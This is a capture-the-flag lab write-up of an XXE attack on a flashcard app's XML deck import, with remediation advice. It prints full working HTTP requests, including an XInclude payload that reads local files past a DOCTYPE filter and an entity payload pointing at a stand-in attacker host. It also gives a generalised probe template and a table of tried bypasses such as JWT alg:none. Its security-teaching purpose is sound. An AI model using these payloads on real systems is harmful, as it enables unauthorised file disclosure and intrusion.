Tanuki: XXE via XInclude (DOCTYPE Filter Bypass)
Part 1: Pentest Report
Executive Summary
Tanuki is a spaced-repetition flashcard study application (React SPA + Express JSON API) hosted on the BugForge lab platform. Users register, study seeded decks, and import custom decks via a file upload that accepts JSON or XML. The XML import path routes uploaded bodies into a libxml2-based parser; a substring filter ahead of the parser blocks the literal bytes <!DOCTYPE, closing the canonical entity-based XXE path.
Testing confirmed 1 finding:
| ID | Title | Severity | CVSS | CWE | Endpoint |
|---|---|---|---|---|---|
| F1 | XML External Entity (XXE) via XInclude on deck import | High | 6.5 | CWE-611, CWE-184 | POST /api/decks/import |
The XInclude specification does not require any DOCTYPE token, so the substring filter has nothing to match. An <xi:include> element placed inside a card’s <front> field is resolved by the parser, the file content is persisted as the card’s text, and a subsequent GET /api/study/:deckId/cards returns it verbatim. The flag was read from /app/flag.txt.
Objective
Single objective: read the flag from the lab container. Any account is acceptable; no specific identity is required.
Scope / Initial Access
# Target Application
URL: https://lab-1778630791839-gvmes8.labs-app.bugforge.io
# Auth details
Registration: open, unauthenticated, no email verification.
POST /api/register issues a JWT (HS256) with payload {id, username, iat}.
Role is not encoded in the token; it is read server-side on each request.
Test account: id=4 username=haxor
The application returns a standard Express powered HTTP response and uses snake_case JSON keys (card_count, cards_studied). CORS is wide-open (Access-Control-Allow-Origin: *).
Reconnaissance: Frontend Advertised an XML Parse Path the Walkthrough Skipped
- The compiled React bundle (
main.2a8c2eb1.js, md5486d073089df9e3216ceed5c49dff009) was byte-identical to a prior tanuki engagement. Frontend code unchanged; backend may or may not be. - The deck import file picker declares
accept=".json,.xml". The operator walkthrough only exercised the JSON path; the XML path was wired but never tested. - The JWT carries
{id, username, iat}only. The/api/verify-tokenresponse includes arolefield read from the database, and the frontend gates the/adminlink onuser.role === "admin". - The seeded user table holds at least 3 prior accounts before the registered test account (id=4), implying
id=1is likely the administrator. /api/admin/users[/:id],/api/admin/decks[/:id], and/api/admin/cards[/:id]are referenced from the bundle as full CRUD surfaces.
The XML import surface (observation 2) was the primary motivator for the XXE hypothesis.
Application Architecture
| Component | Detail |
|---|---|
| Backend | Node.js Express (x-powered-by: Express on every response) |
| Frontend | React SPA + Material-UI, single bundle ~516 KB |
| Auth | JWT HS256, payload {id, username, iat}; role read from DB on each request |
| XML parser | libxml2-backed (Node binding such as libxmljs or libxmljs2); XInclude enabled; XML_PARSE_NONET set (network blocked); XML_PARSE_DTDLOAD evidently off (DTD loading not observed) |
| CORS | Access-Control-Allow-Origin: * everywhere |
API Surface
| Endpoint | Method | Auth | Notes |
|---|---|---|---|
| /api/register | POST | No | Public registration; returns JWT |
| /api/login | POST | No | Username + password |
| /api/verify-token | GET | Yes | Returns {user: {id, username, email, full_name, role}} |
| /api/decks | GET | Yes | Lists seeded decks (id 1, 2, 3) |
| /api/decks/:id | GET | Yes | Single deck details |
| /api/decks/import | POST | Yes | Multipart upload; declared formats .json and .xml |
| /api/study/:deckId/cards | GET | Yes | Cards for a deck, including front / back fields |
| /api/study/progress | POST | Yes | SM-2 review submission |
| /api/study/session | POST | Yes | Records a study session |
| /api/admin/users[/:id] | GET / POST / PUT / DELETE | Yes (admin) | Server returns 403 {"error":"Admin access required"} for non-admin |
Known Users
| Username | ID | Role |
|---|---|---|
| (unknown, presumed admin) | 1 | admin (inferred from FE role-gated link and admin-middleware existence) |
| (unknown) | 2 | unknown |
| (unknown) | 3 | unknown |
| haxor | 4 | user |
Attack Chain Visualization
┌───────────────────────┐ ┌────────────────────────┐ ┌──────────────────────┐ ┌────────────────────────┐
│ POST /api/decks/ │ │ POST /api/decks/import │ │ Parser resolves │ │ GET /api/study/:id/ │
│ import with <!DOCTYPE │ ▶ │ with xmlns:xi + │ ▶ │ file:///app/flag.txt │ ▶ │ cards returns flag in │
│ → 400 (filter blocks) │ │ <xi:include> in card │ │ and persists it as │ │ the card's front field │
│ │ │ front → 200 imported │ │ card.front │ │ │
└───────────────────────┘ └────────────────────────┘ └──────────────────────┘ └────────────────────────┘
Findings
F1: XML External Entity (XXE) via XInclude on deck import
Severity: High
CVSS v3.1: 6.5, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-184 (Incomplete List of Disallowed Inputs)
Endpoint: POST /api/decks/import
Authentication required: Yes (any registered account; registration is open and unrestricted)
Description
The XML deck import endpoint is gated by a case-sensitive UTF-8 substring filter on the literal bytes <!DOCTYPE before the body reaches the parser. The filter blocks canonical entity-based XXE payloads (any body containing <!DOCTYPE returns 400 {"error":"Invalid file format or content"}).
XInclude does not require any DOCTYPE token. An XML body containing only the namespace declaration xmlns:xi="http://www.w3.org/2001/XInclude" and an <xi:include parse="text" href="file:///path"/> element passes the filter, is parsed by libxml2 with XInclude enabled, and the include is resolved during parse. The resolved file content is then assigned to whichever element contained the <xi:include> and is persisted as part of the imported deck. Reading the deck back via GET /api/study/:deckId/cards returns the file content verbatim in the card’s front field.
Two defects compound here:
- The pre-parse filter is a substring blocklist on a single token (
<!DOCTYPE). It does not reject XInclude payloads or any other non-DTD XML feature that can resolve external resources. - The XML parser is configured with XInclude resolution enabled and
file://resolution allowed. Only network resolution is blocked (XML_PARSE_NONETset), which prevents OOB but does not prevent local file reads.
Impact
Arbitrary file read on the application container, scoped to whatever Unix user the Node process runs as.
Reproduction
Step 1: Confirm the DOCTYPE filter rejects canonical XXE
POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b
------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY oob SYSTEM "http://attacker/p1">]>
<deck><name>&oob;</name></deck>
------b--
Response: 400 {"error":"Invalid file format or content"}. The same body without the <!DOCTYPE line parses successfully.
Step 2: Send an XInclude-based payload pointing to /app/flag.txt
POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b
------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml
<?xml version="1.0"?>
<deck xmlns:xi="http://www.w3.org/2001/XInclude">
<name>x</name>
<description>d</description>
<category>p</category>
<cards>
<card>
<front><xi:include parse="text" href="file:///app/flag.txt"/></front>
<back>b</back>
</card>
</cards>
</deck>
------b--
Response: 200 {"id":N,"message":"Deck imported successfully","cards_count":1}. The numeric id is the new deck identifier.
Step 3: Read the resolved content back via the study endpoint
GET /api/study/N/cards HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Response (abridged):
[
{
"id": M,
"front": "bug{uA8e4RWc9adWFnqaHR6ULX3az5j287ap}",
"back": "b",
"difficulty": 0.5,
"repetitions": 0
}
]
The card’s front field contains the file content. Substitute any readable file path in the href to read other files within the parser’s scope.
Remediation
Fix 1: Disable XInclude in the parser
// BEFORE (Vulnerable), libxmljs2-style options
const parsed = libxml.parseXml(body, {
noent: false,
nonet: true,
xinclude: true
});
// AFTER (Secure)
const parsed = libxml.parseXml(body, {
noent: false,
nonet: true,
xinclude: false,
dtdload: false,
doctype: false
});
Fix 2: If XInclude must be supported, restrict scheme and path resolution
// BEFORE (Vulnerable), XInclude resolves any file:// URI
const parsed = libxml.parseXml(body, { xinclude: true });
// AFTER (Secure), replace the resource loader with an allowlist
const parsed = libxml.parseXml(body, {
xinclude: true,
resourceLoader: (uri) => {
if (!ALLOWED_INCLUDES.has(uri)) {
throw new Error('XInclude target not permitted');
}
return readWhitelistedResource(uri);
}
});
Fix 3: Replace the substring blocklist with parser-level hardening
// BEFORE (Vulnerable), pre-parse string check
if (body.includes('<!DOCTYPE')) {
return res.status(400).json({ error: 'Invalid file format or content' });
}
const parsed = libxml.parseXml(body);
// AFTER (Secure), drop the string blocklist and configure the parser
const parsed = libxml.parseXml(body, {
noblanks: true,
noent: false,
nonet: true,
xinclude: false,
dtdload: false,
dtdvalid: false,
doctype: false
});
Additional recommendations:
- Stop using string blocklists as the primary defense against XXE. They are bypassable through encoding, case, whitespace, and class-of-attack pivots (XInclude here).
- Treat XML deserialization as a sensitive operation; gate parser configuration centrally rather than per-handler.
- For deck import specifically, prefer JSON-only on the wire; if XML support is a product requirement, parse to a constrained intermediate (e.g. JSON Schema) before persistence.
- Restrict the application’s filesystem view at the container layer (read-only root filesystem, separate volume for flag/secret material, file ACLs that deny the Node user access to
/app/flag.txtand.env-style files). - Apply consistent input validation across all upload-accepting endpoints, not just the one most recently scrutinized.
OWASP Top 10 Coverage
- A05:2021, Security Misconfiguration: XML parser is configured with XInclude enabled by default. The protective measure (
XML_PARSE_NONET) addresses the network resolution case but the local file resolution case was left enabled. - A03:2021, Injection: XInclude is an XML-feature injection: an attacker-controlled element is interpreted as a parser directive rather than as data.
Tools Used
| Tool | Purpose |
|---|---|
| Caido | HTTP proxy and request editor for replaying and modifying requests captured from the operator walkthrough |
| curl | Manual multipart payload construction for the XInclude probes (--data-binary + heredoc) |
| Bash | Wrapping multipart boundary construction and iterating through candidate file paths |
References
- CWE-611, Improper Restriction of XML External Entity Reference: https://cwe.mitre.org/data/definitions/611.html
- CWE-184, Incomplete List of Disallowed Inputs: https://cwe.mitre.org/data/definitions/184.html
- OWASP XML External Entity (XXE) Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- W3C XInclude 1.0 specification: https://www.w3.org/TR/xinclude/
- libxml2 parser options reference: https://gnome.pages.gitlab.gnome.org/libxml2/devhelp/libxml2-parser.html
Part 2: Notes / Knowledge
Key Learnings
- XInclude bypasses
<!DOCTYPEsubstring filters on XML uploads. When DOCTYPE is the only filter, XInclude is the open door. Probe shape:<root xmlns:xi="http://www.w3.org/2001/XInclude"><elem><xi:include parse="text" href="file:///path"/></elem></root>, substituting the app’s schema for<root>/<elem>so the resolved text lands in a reflected field. Surfaced in libxml2 (Nodelibxmljs,libxmljs2), Python lxml, and Java parsers built on JAXP, wherever XInclude is enabled by parser flag.
Failed Approaches
| Approach | Result | Why It Failed |
|---|---|---|
Canonical DOCTYPE-bearing XXE (<!DOCTYPE deck [<!ENTITY oob SYSTEM "...">]>) |
400 Invalid file format or content |
Substring filter on <!DOCTYPE blocks the body before it reaches the parser |
Bare DOCTYPE (<!DOCTYPE deck> with no entities) |
400 same response | Filter matches the literal <!DOCTYPE token regardless of what follows |
| Internal entity declaration without SYSTEM/PUBLIC | 400 same response | Filter does not distinguish entity types; rejects any <!DOCTYPE body |
Parameter entity (<!ENTITY % p "v">) |
400 same response | Same filter; classification of entity semantics is irrelevant |
Lowercase doctype (<!doctype ...>) |
200, deck imported with cards_count: 0 |
Filter is case-sensitive so the body passes, but the resulting XML is invalid and the parser falls through to a stub path that imports an empty deck |
Extra-whitespace doctype (<! DOCTYPE ...>) |
200, cards_count: 0 |
Same as above; bypasses the filter but produces invalid XML |
| UTF-16 LE with BOM | 400 or 200 stub | Parser does not respect UTF-16 charset on the multipart part |
Content-Type: text/xml instead of application/xml |
400 | Filter is content-type independent |
Filename .json with XML content |
400 | Filter inspects body, not filename |
XInclude with parse="text" href="http://..." |
200, card front: "[object Object]" |
XML_PARSE_NONET blocks network resolution; the include fails and the parser emits a stub value |
Frontend-only admin gate hypothesis (direct GET /api/admin/users with non-admin JWT) |
403 Admin access required |
Server-side middleware enforces role; the frontend gate is not the only check |
Mass assignment of role: "admin" on registration |
200, but verify-token returns role: "user" |
Registration handler whitelists known fields; extra keys are silently dropped |
JWT alg: "none" against /api/verify-token |
403 Invalid token |
Server pins acceptable algorithms; unsigned tokens are rejected before role check |